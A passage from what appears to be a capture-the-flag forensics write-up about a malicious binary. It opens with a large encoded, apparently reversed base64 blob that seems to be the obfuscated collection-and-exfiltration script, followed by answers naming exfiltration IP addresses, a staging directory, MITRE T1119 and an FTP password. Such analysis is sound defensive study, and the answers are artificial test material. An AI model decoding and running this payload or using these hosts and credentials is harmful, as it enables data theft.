JTWm9SSEl1bEdJbFpYWnB4V1ppQlNTZ3d5WnVsR2EwbG5jbFpYWmdnMloxOW1jb1JISW9OWGR5QmlibFJuWnZCU1ozQlNaeVZHYTNCQ1pzSjNiM0JTWWc0V1MrQUhQSzBnUHc5Q1B1UVhZb1JISWxkbWJoaDJZZzhHZGdVV2JwUkhJemRDZHBCQ1psUldhalZHWmdVbWRua0VJMFZuWWd3U2VzVkdkaHhHSWwxR0l1VldaaUJ5Y25RWFlvUkZJL0FYWjBOSEkwaFhadUJTWm9SSElsdFdZMEJ5YjBCQ1psUlhZMGwyY2xoR0kwVm5ZZ3dpY2haV1lnMDJieVpHSWw1MmJsMTJiekJ5WnVsbWNwMUdaaEJpYmxWbVlnVW1kblUzYjVCaWJsaDJkZ2NtYnB4V1psWkdJMEZHYTBCeWR2NTJhZ1UzYlpCaUwxOVdlZ2dHZHBkSElsSlhZb05ISXZSSEluNVdhMDVXWTNCaWJsVm1ZZ1VtZG5rRUluNVdhb1JYWnQ5MmNnTTNKbEpYWm9SSElsTlhkaE5XWmlCQ2QxOUdJbjVXYW9OV1lsSkhJdGRTU2c0eWNwaEdkZ1VXWnpCU2R2bEhJdVZHYTNCQ2RoVm1jbkJ5WnVsMmJrQlNaeWRTZHZsSElsQjNiSUJpUHd4REkrQTNMOEFDTDVWR1MrQUhQSzBnUDVSMmJpeGpDTjREWmhWR2F2d2pDTjRUWnNsSGR6OUNQSzBRZmdBQ0lnb1FEN1lXYXlWMmN0TW5iaE5ISXNrbWNpbEdiaE5FSTZrSGJwMVdZbTFDZHU5bVpnQUNJZ29RRDdCU2VrOW1ZZ0FDSWdvUUQrVUdiNVIzYzhvUUQrUVdZbGhHUEswZ1BzMUdkb3hqQ040RGJ0UkhhZ1VFVVpSMVFQUlVJOG9RRGlBRUk5QVNlazltUXMxR2RvUmlDTm9RRGwxV1lPeEdiMVpFSTVSbmNsQjNieUJGWnVGR2M0VlVMZ0VESTBObmNwWlVMZ1EzWWxwbVlQMUNkalZHYmxORkk4QlNaekpYZGpWbVV0QWlJRmhWUnVzMFRQeEVWVjlrSWdJWFoweFdhRzFDSWlVMllwWm1aUEJDZG05MmN2SjNZcDFFWHpWR2JwWkVJdEZtY245bWNReGxPREpDSW9SWFlRMUNJdFZHZEpSR2JwaDJRdFFYWkhCU1BnQUNhMEZHVXI5MmJzUlhkdlJpQ05vUURLMHdkdlJtYnBkMWRsNTBiTzFDSTBsV1lYMUNJaUlDWW9SWFlRTkhKaUFXUDBCWGF5TjJjdklDSTBOWGFNUm5ibDFXZG5KWFF0QUNhMEZHVWxoWFIzUkNJb1JYWVFWR2JwWlVMZ00zY2xOMmJ5QlZMMEpYWTBObENOVTJZeTltUnRBQ2EwRkdVelJDSW9SWFlRVkdicFpVTGdVR2JwWlVMMFYzVGd3SElBSmlDTlFYYTRWbUNOVTJjdngyWUswZ0lnaEdkaEJWWjJsR2FqSlhZa0lDWWdRWGR3cFFEcTBUZWx0R2R6OUdhdEF5TDRNVE11WWpOdWtqTng0U056QTBJdEVEVEgxMmFMWlRhaE1rSjQwa09sTldhMkpYWno5eUw2QUhkbU5ISXVWR2N2cFFEaUFrQ05JQ2Q0Um5MMEJYYXlOMlVsTm1iaDVXWjA1V2FoMUdYb1JYWVFSM1loSkhkNFYwZGtJQ0k5QUNhMEZHVXpSaUNOSVNidk5tTFFOMFV1bDJWY2hHZGhCRmRqRm1jMGhYUjNSaUlnMERJb1JYWVFWR2VGZEhKSzBnQ05VMll5OW1SdEFDYTBGR1UwTldZeVJIZUZkSEpnZ0dkaEJsYnZsR2RoNVdhME5YWkUxQ0lseFdhR0JYYWFkSEpnZ0dkaEJWTGdVbWRwaDJZeUZVTGs1V1l3aFhSSzB3WnVsMmN5RkdVamwyY2hKVVp6VlZMZ1VHYnBaRWNwcDFka0FTWnNsbVIwVjNUdEFDYnlWRmNwcDFka0FTYXlWVkxnSUNkbGQyVmlBQ2R1VjJaQkpYWnpWVkxnUTNjbFZYY2xKbFlsZFZMbHQyYjI1V1NLMGdDTkl5Y3M5MmJVMXlhelZHUnd4V1pJeDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJb1JYWVFSM1loSkhkNFYwZGtvUURpQVhhNjVDVURObGJwZEZYeWxHUjBWMlp5Rkdka0lDSTlBU1pzbG1Sd2xtVzNSaUNOSUNjcHBuTHQ5Mll0SVhZa0ZtYzBaMmJ6OVZac0pXWTBKM2J3MUNjak5uYnBkM0x3OGljME5YYWs5U1pzSldZMEozYncxQ2NqTm5icGQzTHpSM1kxUjJieUIzTGpsR2RoUjNjdjAyYmo1aWNoUldZeVJuWnZObkx6VjNMdm96Y3dSSGRvSkNJOUFDYnlWRmNwcDFka29RREswQUlsTm1jdlpVTGdnR2RoQlZaMmxHYWpKWFlrQUNhMEZHVXU5V2EwRm1icFIzY2xSVUxnSVhhRVJYWm5KWFkwUkNJb1JYWVExQ0lsWlhhb05tY0IxeWN6Vm1jdzEyYkRwUURpQVhhNjVTWnRGbWIwTjNib1JDWHlsR1IwVjJaeUZHZGtJQ0k5QUNhMEZHVWxaWGFvTm1jaFJpQ05jU1oxNVdhMDUyYkRsSGIwNVdac2wyVW5BU1BnVTJZdVZtY2xaV1p5QjFjelZtY245bWNRUmlDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhUWQwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJpY3ZBQ2RzVjNjbEpIY25wUURsTm1jdlpVTGdreUowaEhkdThtWnVsV1p5RkdhVGRDSXlsR1IwVjJaeUZHZGtBQ2EwRkdVdDRXYXZwRUtnZ0dkaEJWWnNsbVJ0QVNac2xtUnRRWGRQQkNmZ1VtY2hoMlVpMTJVdFFYWkhwUURLMFFmZ0FDSWdvUUQ5QkNJZ0FDSWdBQ0lLMFFaakozYkcxQ0lvUlhZUTUyYnBSWFl1bEdkelZHWmtBaWJ2bEdkaDVXYTBOWFpFMUNJbDFXWU94R2IxWmtMZlJDSW9SWFlRMUNJdFZHZEoxU2V3OTJRZ0FDSWdBQ0lnQUNJZ0FDSUswd2Vna0NhMEZHVXU5V2EwRm1icFIzY2xSR0pnVW1idEFTWnRGbVRzeFdkRzV5WGtnQ0ltbEdJZ0FDSWdBQ0lnb1FEZ0FDSWdBQ0lnQWlDTlVXYmg1a0xmUkNJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFSTlBQ2EwRkdVdTlXYTBGbWJwUjNjbFJHSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSWdBQ0lLMEFmZ2NTWjE1V2EwNTJiRGxIYjA1V1pzbDJVbkFpYnZsR2RqRmtjdkpuY0YxQ0lsTm1jdlpVTGdRM2NweEVkNFZHSmdVR1oxeDJZdWxVTGdVMmN5VjNZbEpWTGdJWGFFaDJZeUZXWnpSQ0l0VkdkSlJHYnBoMlF0UVhaSEJTUGd3R2IxNUdKSzBBSWdBQ0lnQUNJZ0FDSWdBQ0lLMGdJME4zYnVvaUlnd2lJblIyYnVvaUlnd2lJd1IyYnVvaUlnd2lJelIyYnVvaUlnd2lJMFIyYnVvaUlnQUNMaVEzY3c1aUtpQUNMaXdXYmw1aUtpQUNMaWMyY3Q1aUtpQUNMaWdIZHZSbUxxSUNJc0lDZTB4R2V1b2lJZ0FDSWdBQ0lnQUNJZ0FDSUswQUlzSUNlMDlHY3VvaUlnd2lJMFoyYnE0aUlnd2lJMk4zWXVvaUlnd2lJbVJHY3VvaUlnd2lJNFJIY3c1aUtpQUNMaVFIY3c1aUtpQUNMaWczY3NobkxxSUNJc0l5Y3NobkxxSUNJc0lDZWo5R1p1b2lJZ3dpSWo5R1p1b2lJZ0FTUGdRM2NweEVkNFZHSkswZ0NOMG5DTlVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdVMll5OW1SdEF5YXY5R2IwVjNUZ1VXYmg1VUxnTTNjbE4yYnlCVkx3OUdkVEJDSWdBaUNOc0hJcFVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdzMmJ2eEdkMTlFSWwxV1lPMUNJek5YWmo5bWNRMUNkbGRFS2dZV2FLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWNsTjNjbE4yYnlCbGNsTlhWbkFpY3BSRWRsZG1jaFJISmdnR2RoQlZMdWwyYktoQ0lvUlhZUVZHYnBaVUxnVUdicFpVTDBWM1Rnd0hJa2wwY3pWMll2SkhVZ3dTWnRGbVR6TlhaajltY1FCQ2RqVm1haTlVTDBOV1pzVjJVZ3dISXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTjBuQ04wSElnQUNJSzBBSWdVMmNzRm1aa0FDSWdBQ0lnQUNJSzB3ZWdnMlkwRjJZZzBISWdBQ0lLMGdjbE5YVjA1V1p5SlhkalJDSXhWV0xnSVhaelZsTHBnaWNsNTJkUFJYWkg1eVhrQUNJZ0FDSWdBQ0lLMHdlZ2tuYzBCQ0lnQWlDTnNISTBOV1pxSjJUdFVtY2xoMlZnd0hJek5YWmo5bWNROWxNejRXYVhCQ2RqVm1haTlVYXRkVkwwVjJSZzBESXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhV0YwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJDYnNWbmJrNGpNZ1VXZHNGbWR2QUNWRmRFSTBOV2RrOW1jUU5YZHlsbVZwUm5iQkJDU1VGRVVnSWpjbFJuYmxOVWUwbG1jMU5XWlR4RmR2OW1jY3hsT0ZOVVFRTlZSTkZrVHZBeVlwMTJkSzBRWmpKM2JHMUNJcGNDZDRSbkx6SlhaelZIYmhOMmJzZENJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFS2dnR2RoQlZac2xtUnRBU1pzbG1SdFFYZFBCQ2ZnUW5iMTkyWWpGa2NsTlhWZkp6TXVsMlZnTTNjaHgyUXRBQ2RqVm1haTlVYXRkVkwwVjJSSzBRWmpKM2JHMUNJcGNDZDRSbkx2Wm1icE5FUm5BaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTHVsMmJLaENJb1JYWVFWR2JwWlVMZ1VHYnBaVUwwVjNUZ3dISXN4V2R1UmlQeUFpVEpGVVRQUmtVRk5WVjZZbmJsUmlPalJHZGxkMmNrOUNJME5YWjB4bWJLMGdDTlUyWXk5bVJ0QVNLblFIZTA1U1p0Rm1ieVYyYzFkQ0l5bEdSMFYyWnlGR2RrQUNhMEZHVXQ0V2F2cEVLZ2dHZGhCVlpzbG1SdEFTWnNsbVJ0UVhkUEJDZmdJWFp6VkZkdVZtY3lWM1lrb1FESzBRZkswQWJzVm5UdFFYZFBCQ2ZnVTJZeTltUnRBaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTGdrbmN2UjNZbEpYYUVCU1p3bEhWdFZHZEoxQ0l0VkdkSjF5ZGw1RUlnQUNJSzB3ZWdrU0t5Vm1icEZHZHU5MlFnVUdjNVJGYTBGR1V0QWljcFJFZGxkbWNoUkhKZ2dHZGhCVkxnZ0dkaEJWTDBOWFpVaENJMDltYnRnQ0ltbG1DTm9RRGlNWFpzbG1SZ01XYXNKV2RReDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJeWxHUjBWMlp5Rkdka29RRGlNbmNsTlhWY3B6UWlBU1BnSVhhRWgyWXlGV1p6UmlDTm9RRG4xV2FrQXljelYyWXZKSFV0UW5jaFIzVUswd1p0bEdKZ1VHYnBaRWQxOVVMZ3dtYzFSQ0lwSlhWdEFDZHpWV2R4Vm1VaVYyVnRVMmF2Wm5iSnBRREswZ0ltWldhMDVDWnlGMlF5Vm1ZdFZXVGZKWFkwTm5jbEJYZFR4MWNrRjJiczUyZHZSRVh5VjJjVlJuYmxKbmMxTkdKY05uY2xOWGRjcHpRaUFTUGdjV2JwUmlDTklpWm1sR2R1UW1jaE5rY2xKV2JsMTBYeUZHZHpKWFp3VjNVdkFETXdrak8wUVRNdWNET3g0aU53SWpMMFF6THZvRGMwUkhhaUFTUGd3bWMxUmlDTlVVVEI1a1VGTlZWNlluYmxSQ0k5QWljbE5YVjA1V1p5SlhkalJpQ05VVVRCNWtVRlJWVlExMFREcGpkdVZHSmcwRElsMVdZdVIzY3ZoR0o&oeol=CRLF

Answer: 35.169.66.138,44.206.187.144

---

Task 9

Question

The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?

Solution

You can find the directory in the deobfustcated code as shown in the following image.

Answer: C:\Users\Public\Public Files

---

Task 10

Question

What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?

Solution

The malicious binary uses the MITRE Techinque with an ID of T1119. You can find more details about this technique in the following link.

Automated Collection, Technique T1119 - Enterprise | MITRE ATT&CK®

Answer: T1119

---

Task 11

Question

What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?

Solution

You can find the password in the deobfustcated code as shown in the following image.

Answer: M8&C!i6KkmGL1-#